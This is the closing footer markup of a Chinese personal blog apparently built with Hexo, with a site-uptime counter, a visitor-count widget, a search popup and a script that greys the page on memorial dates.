target="_blank">苏ICP备20028116号-1</a></div><div class="copyright"><span>&copy; 2020 – 2021 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> gyy</span></div><div class="live_time"><span>本博客已在各种灾难中运行了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2020-10-20T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="goUp" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#000000" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="想要搜些什么？" value=""></div><div id="local-search-result"></div></div><script>const date = new Date();
const today = (date.getMonth() + 1) + "-" + date.getDate()
const mourn_days = ["4-4","9-18","12-13"]
if (mourn_days.includes(today)) {
  document.documentElement.style.filter = "grayscale(1)";
}</script></div><!-- hexo-inject:begin --><!-- hexo-inject:end --></body></html>